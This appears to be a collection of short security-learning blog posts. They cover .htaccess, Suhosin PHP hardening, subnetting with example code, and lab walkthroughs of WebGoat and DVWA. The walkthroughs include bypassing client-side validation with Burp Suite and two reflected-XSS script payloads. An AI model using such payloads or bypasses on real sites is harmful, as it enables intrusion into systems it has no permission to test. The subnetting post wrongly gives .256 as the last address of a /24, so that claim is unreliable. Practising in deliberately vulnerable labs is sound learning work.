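    """Return (cmd, host, port); raises ValueError on truncated or non-v5 data."""
    try:
        if data[0] != SOCKS_VERSION or data[2] != 0x00:
            raise ValueError("not a SOCKS5 request")
        host, end = _decode_addr(data, 3)
        if len(data) != end + 2:
            raise ValueError("bad request length")
        return data[1], host, struct.unpack("!H", data[end:end + 2])[0]
    except (IndexError, OSError, ValueError) as exc:
        raise ValueError("malformed SOCKS5 request: %s" % exc)

def build_reply(rep: int, bind_host: str, bind_port: int) -> bytes:
    """Server reply: VER | REP | RSV | ATYP | BND.ADDR | BND.PORT (section 6), same layout."""
    return build_request(rep, bind_host, bind_port)

def parse_reply(data: bytes) -> tuple:
    """Return (rep, bound_host, bound_port); REP 0x00 means succeeded."""
    return parse_request(data)
```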



Manusia Tak Sempurna
The .htaccess file is an ASCII text file located in the web root directory (usually "public_html"); it is often used to change the default settings of the web server.
.htaccess can be used for:
- blocking specific ip address
- redirect old pages to the new pages
- preventing exploration to the directory
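As an added example (not from the post), an .htaccess file that does the three things listed, written for Apache 2.2 as seen on the target earlier; the IP address and paths are placeholders. The directory's AllowOverride must include Limit, FileInfo and Options (or be All), otherwise the file is silently ignored.

```apache
# Block one client address (mod_authz_host, Apache 2.2 syntax;
# on Apache 2.4 the equivalent is "Require all granted" / "Require not ip 203.0.113.45")
Order Allow,Deny
Allow from all
Deny from 203.0.113.45

# Send visitors of a retired page to its replacement (mod_alias)
Redirect 301 /old-page.html /new-page.html

# Refuse to list the contents of a directory that has no index file
Options -Indexes
```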

Manusia Tak Sempurna
Suhosin is an advanced protection system for PHP installations. It was designed to protect servers and users from known and unknown flaws in PHP applications and the PHP core. Suhosin comes in two independent parts that can be used separately or in combination. The first part is a small patch against the PHP core that implements a few low-level protections against buffer overflows or format string vulnerabilities, and the second part is a powerful PHP extension that implements all the other protections.

Feature List

Engine Protection (only with patch)
  • Protects the internal memory manager against buffer overflows with Canary and SafeUnlink protection
  • Protects destructors of Zend hashtables
  • Protects destructors of Zend linked lists
  • Protects the PHP core and extensions against format string vulnerabilities
  • Protects against errors in certain libc realpath() implementations

Misc Features
  • Protection simulation mode
  • Adds the functions sha256() and sha256_file() to the PHP core
  • Adds support for CRYPT_BLOWFISH to crypt() on all platforms
  • Transparent protection of open phpinfo() pages
  • EXPERIMENTAL SQL database user protection

Runtime Protection
  • Transparent cookie encryption
  • Protects against different kinds of (remote) include vulnerabilities: disallows remote URL inclusion (optional black-/whitelisting), disallows inclusion of uploaded files, optionally stops directory traversal attacks
  • Allows disabling the preg_replace() /e modifier
  • Allows disabling eval()
  • Protects against infinite recursion through a configurable maximum execution depth
  • Supports per virtual host / directory configurable function black- and whitelists
  • Supports a separate function black- and whitelist for evaluated code
  • Protects against HTTP response splitting vulnerabilities
  • Protects against scripts manipulating the memory_limit
  • Protects PHP's superglobals against extract() and import_request_vars()
  • Adds protection against newline attacks to mail()
  • Adds protection against \0 attacks on preg_replace()

Session Protection
  • Transparent encryption of session data
  • Transparent session hijacking protection
  • Protection against overlong session identifiers
  • Protection against malicious characters in session identifiers

Filtering Features
  • Filters ASCIIZ characters from user input
  • Ignores GET, POST, COOKIE variables with the following names:
      GLOBALS, _COOKIE, _ENV, _FILES, _GET, _POST, _REQUEST,
      _SERVER, _SESSION, HTTP_COOKIE_VARS, HTTP_ENV_VARS,
      HTTP_GET_VARS, HTTP_POST_VARS, HTTP_POST_FILES,
      HTTP_RAW_POST_DATA, HTTP_SERVER_VARS, HTTP_SESSION_VARS
  • Allows enforcing limits on REQUEST variables, either overall or separately by type (GET, POST, COOKIE):
      - a limit on the number of variables per request
      - a maximum length of variable names (with and without indices)
      - a maximum length of array indices
      - a maximum length of variable values
      - a maximum depth of arrays
  • Allows only a configurable number of uploaded files
  • Supports verification of uploaded files through an external script
  • Supports automatic banning of uploaded ELF executables
  • Supports automatic banning of uploaded binary files
  • Supports automatic stripping of binary content in uploaded files
  • Configurable action on violation:
      - just block the violating variables
      - send an HTTP response code
      - redirect the browser
      - execute another PHP script

Logging Features
  • Supports multiple log devices (syslog, SAPI module error log, external logging script)
  • Supports freely configurable syslog facility and priority
  • Supports per-log-device selection of the alert types to log
  • Alerts contain the filename and line number that triggered them
  • Alerts contain the IP address of the user triggering them
  • The IP address can also be extracted from X-Forwarded-For HTTP headers (e.g. for reverse proxy setups)




Manusia Tak Sempurna

Subnetting uses a 32-bit binary number, the subnet mask, to differentiate between the network ID and the host ID. It indicates where a host is located: on the local network or on an external network.

We often see the IP address of a computer written as follows: 192.168.0.1/24.
The /24 indicates that the network is divided into 256 addresses, or 254 client computers, each with its own host ID; the subnet mask for this group is 255.255.255.0, and in this workgroup only one group can be formed, starting at xxx.xxx.xxx.0 and running to xxx.xxx.xxx.256.
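An added example (not from the post) that does the /24 arithmetic above with 32-bit integer operations: from 192.168.0.1/24 it derives the mask 255.255.255.0, the network ID and host ID, the broadcast address and the 256/254 address counts, and it answers whether another address is local or external. It generalizes to any prefix length, not only /24.

```python
def ip_to_int(ip: str) -> int:
    """Dotted quad -> 32-bit integer, rejecting anything that is not four 0..255 octets."""
    parts = ip.split(".")
    if len(parts) != 4 or not all(p.isdigit() and 0 <= int(p) <= 255 for p in parts):
        raise ValueError("bad IPv4 address: %r" % ip)
    n = 0
    for p in parts:
        n = (n << 8) | int(p)
    return n

def int_to_ip(n: int) -> str:
    return ".".join(str((n >> shift) & 0xFF) for shift in (24, 16, 8, 0))

def prefix_mask(prefix: int) -> int:
    """/prefix as a 32-bit mask: `prefix` one-bits followed by zero-bits."""
    if not 0 <= prefix <= 32:
        raise ValueError("prefix must be 0..32")
    return (0xFFFFFFFF << (32 - prefix)) & 0xFFFFFFFF

def subnet_info(cidr: str) -> dict:
    """Split a.b.c.d/prefix into network ID, host ID, mask, broadcast and address counts."""
    ip_str, prefix_str = cidr.split("/")
    prefix = int(prefix_str)
    ip, mask = ip_to_int(ip_str), prefix_mask(prefix)
    network = ip & mask
    host_bits = 32 - prefix
    total = 1 << host_bits
    # /31 and /32 have no separate network/broadcast pair, so every address is usable.
    usable = total - 2 if host_bits >= 2 else total
    return {
        "mask": int_to_ip(mask),
        "mask_binary": format(mask, "032b"),
        "network": int_to_ip(network),
        "host_id": ip & ~mask & 0xFFFFFFFF,
        "broadcast": int_to_ip(network | (total - 1)),
        "addresses": total,
        "usable_hosts": usable,
        "first_host": int_to_ip(network + 1 if host_bits >= 2 else network),
        "last_host": int_to_ip(network + total - 2 if host_bits >= 2 else network + total - 1),
    }

def same_network(cidr: str, other_ip: str) -> bool:
    """True when other_ip sits in the same subnet as the cidr's address (local delivery),
    False when traffic to it has to go through the gateway (external network)."""
    ip_str, prefix_str = cidr.split("/")
    mask = prefix_mask(int(prefix_str))
    return ip_to_int(ip_str) & mask == ip_to_int(other_ip) & mask

if __name__ == "__main__":
    for key, value in subnet_info("192.168.0.1/24").items():
        print("%-13s %s" % (key, value))
    print("192.168.0.200 local?", same_network("192.168.0.1/24", "192.168.0.200"))
    print("192.168.1.5 local?", same_network("192.168.0.1/24", "192.168.1.5"))
```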

Manusia Tak Sempurna

CASE

This website performs both client and server side validation. For this exercise, your job is to break the client side validation and send the website input that it wasn't expecting. You must break all 7 validators at the same time.
picture

I try to input
picture

but it seems not to succeed; it just makes a pop-up appear
picture

so I try with Burp Suite to change the variable in each box
picture

box 1: I just add ABC
box 2: I just add 456
box 3: I just add !@#
box 4: I just add 7
box 5: I just add 12345
box 6: I just add 1234567
box 7: I just add 9876

After I change the variables in the boxes, it works. The client-side validation can be bypassed.
picture



Manusia Tak Sempurna
Before we install WebGoat we need Java; you can download it here,
and if you want to download WebGoat you can download it here.
After that you can extract the file from the terminal:


p7zip -d WebGoat-OWASP_Standard-5.3_RC1.7z


If you don't have p7zip you can install it from the terminal:


apt-get install p7zip


Then, if you want to keep your desktop clean, you can move it into /pentest/web/webgoat; you can do it from the terminal:


mkdir /pentest/web/webgoat
mv WebGoat-5.3_RC1/* /pentest/web/webgoat



Now make /pentest/web/webgoat/webgoat.sh executable with:

chmod +x /pentest/web/webgoat/webgoat.sh



Now you can run WebGoat on port 80 or 8080 with

sh /pentest/web/webgoat/webgoat.sh start80 or sh /pentest/web/webgoat/webgoat.sh start8080

and to stop Tomcat and WebGoat use

sh /pentest/web/webgoat/webgoat.sh stop



Open up Firefox and connect to http://127.0.0.1/webgoat/attack or http://127.0.0.1:8080/webgoat/attack, according to the port you used to run Tomcat.



username : guest
password : guest



After that you can use WebGoat.
Manusia Tak Sempurna

DVWA is an application for practising and learning about web vulnerabilities. It includes:
Brute Force
Command Execution
CSRF
File Inclusion
SQL Injection
SQL Injection Blind
Upload
XSS Reflected
XSS Stored



XSS Reflected
I just try the XSS low level with this script:
<script>alert("XSS LOW")</script>
and the result is like in this picture


And then the next level is medium.
In this level I just try with this script:
<script language=javascript>alert("XSS Medium");</script>
and the result is like in the picture


The next level is the high level.
On this level I can't find the right script, so I couldn't solve this level.
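As an added example (not the post's or DVWA's code), a model of the three filter levels the post walks through: no filtering, a blacklist that only deletes the literal string <script> (my assumption about what the medium level does, and it explains why the second payload still fires), and HTML entity encoding of the reflected value, which is the kind of output encoding a resistant high level applies and the fix to prefer over any blacklist.

```python
import html
import re

# The two payloads used in the post.
PAYLOAD_LOW = '<script>alert("XSS LOW")</script>'
PAYLOAD_MEDIUM = '<script language=javascript>alert("XSS Medium");</script>'

def render_low(name: str) -> str:
    """No filtering: whatever was sent is echoed into the page."""
    return "Hello " + name

def render_medium(name: str) -> str:
    """Blacklist model (assumption, not DVWA's source): delete the exact string
    '<script>' and nothing else. Any attribute, whitespace or case change slips past."""
    return "Hello " + name.replace("<script>", "")

def render_high(name: str) -> str:
    """Output encoding: every character with meaning in HTML becomes an entity, so the
    browser shows the payload as text instead of parsing it as markup."""
    return "Hello " + html.escape(name, quote=True)

SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)

def reflects_script(render, payload: str) -> bool:
    """True when the rendered page still contains a live <script ...> opening tag."""
    return SCRIPT_TAG.search(render(payload)) is not None

def matrix() -> dict:
    """Which payload survives which filter: the table the post's three levels sketch."""
    levels = (("low", render_low), ("medium", render_medium), ("high", render_high))
    return {
        level: {"low_payload": reflects_script(fn, PAYLOAD_LOW),
                "medium_payload": reflects_script(fn, PAYLOAD_MEDIUM)}
        for level, fn in levels
    }

if __name__ == "__main__":
    for level, result in matrix().items():
        print(level, result)
```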
